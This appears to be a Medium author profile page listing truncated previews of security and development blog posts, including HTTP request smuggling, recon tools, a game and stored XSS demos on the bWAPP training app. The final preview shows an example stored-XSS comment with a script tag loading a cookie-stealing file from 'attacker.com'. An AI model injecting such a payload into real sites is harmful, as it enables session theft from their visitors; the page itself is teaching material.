In this article, I’ll discuss my recent web development using Django and if you’re new to this website, let me give you a short brief.

HackbotOne platform is a blogging website. The idea behind this platform is to publish contents from Application Security & Software Development like (Application Development, Security Tools, Bug Bounty write-ups, Open-Source projects and many more) which can be helpful for those who have an interest and passion in these areas.

For the past couple of months, I did few reviews of HackbotOne old website, which I built using MERN stack a few years ago. And…


What is HTTP Request Smuggling?

HTTP Request Smuggling is very critical and high severity vulnerability and was initially discovered by watchfire back in 2005 and later it got re-discovered by James Kettle — (albinowax) in August 2019 and presented his research at DEF CON 27 & Black-HAT USA. HRS vulnerability allows an attacker to smuggle an ambiguous HTTP-request as second request in one single HTTP-request to bypass the security controls of a website and gain access to unauthorized sensitive data and performs malicious activities. …


Why a portfolio site is essential for a Software developer?

A portfolio site is essential for every software developer to showcase projects and technical skills which demonstrates what you can do based upon your resume, your portfolio will be very much helpful on the job search because the employer can able to see your work and will be easier for them to evaluate your work for the suitable job, nowadays for every software developer is quite essential to maintain a web presence like official GitHub, Twitter account & website, so that you can reach out developer communities and build a…


Introduction

Forest Assassin is a 2D adventure platformer game with easy controls and fun gameplay, which helps every one to get started, this is a classic platformer game with wonderfully designed characters and world. To complete the game collect all the coins and the trophy try to collect all 100 gold coins to become the highest scorer in this adventurers platformer game, on your way you will face many obstacles and enemies and use your sword to fight with the enemy.

How to play the game on desktop browser?

To make it easier for the user I have also…


Coronavirus (COVID-19) — Full Stack Application

What is Coronavirus (COVID-19)?

Coronavirus (COVID-19) which is an infectious disease caused by respiratory illness and symptoms like flu, cough, fever, difficulty breathing, on December 31, 2019, the first case was recorded in Wuhan, China and later the virus got spread around the world and as of now, around 1 million+ confirmed cases are being recorded since then.

You can protect yourself from this virus by following basic precautions like washing your hand frequently, avoid touching your face, maintaining a distance of (1 meter or 3 feet) between people and most importantly if you are sick then immediately call for…


Information Gathering is the most important stage of every penetration testing so that you will have a better understanding about your target to exploit vulnerabilities and information like (IP addresses, Subdomain, Open ports and etc.) but to gather information you need proper reconnaissance tools and there are many recon tools which are available on Github but among them, I found Top 10 Recons tools which you can use to gather all of this information about your target.

This article is actually published at https://hackbotone.com/blog/10-recon-tools-for-bug-bounty

Important Note

Always remember before scanning your target you should have proper authorization otherwise you should…


Introduction

HackbotOne website produce contents from various domains such as Web Hacking, Bug Bounty, Application Development & GameDevelopment.

This article is actually published at https://hackbotone.com/blog/hackbotone-full-stack-application

Which type of content you can expect?

Application Development

I will publish contents from both webs & mobile platforms for example — (Android, Node.js, MongoDB, Go, Reactjs, React-Native and many more) which are related to application development I’ll try to cover those topics with step-by-step explanation and mostly in this section I’ll cover programming.

Game Development

Mostly you can expect contents from Unity3d game engine platform and I’ll try to make small video tutorial…


This is the demonstration of Stored Cross-Site Scripting attack in SQLiteManager & User-Agent header and for this demo, I’ll be using bWAPP and bWAPP is a buggy web application and we can use to test various vulnerabilities in the web.

bWAPP Official Link:- http://www.itsecgames.com/

How to perform Stored Cross-Site-Scripting attack in SQLiteManager?


This is the demonstration of Stored Cross-Site-Scripting attack in Change Secret and Cookies and for this demo, I’ll be using bWAPP and bWAPP is a buggy web application and we can use to test various vulnerabilities in the web.

bWAPP Official Link:- http://www.itsecgames.com/

How to perform a Stored Cross-Site-Scripting attack in Change Secret?


Introduction to Stored XSS

When an attacker browsing a web application and found a vulnerability which allows him to embed an HTML tag into the input box and the embedded tag become a permanent item of that page and then the browser will parse this code every time whenever the page will get loaded.

For example in a blogging website attacker found a vulnerability in the comment section and embed this comment.

Attacker’s Comment Nice Blog! a similar type of blog I have also written but with some new content, please visit my site to read more

<script src=”http://attacker.com/stealcookie.js”>…

Anshuman Pattnaik

Python | Application Security | Web Security | Cybersecurity | Software Development

Get the Medium app

A button that says 'Download on the App Store', and if clicked it will lead you to the iOS App store
A button that says 'Get it on, Google Play', and if clicked it will lead you to the Google Play store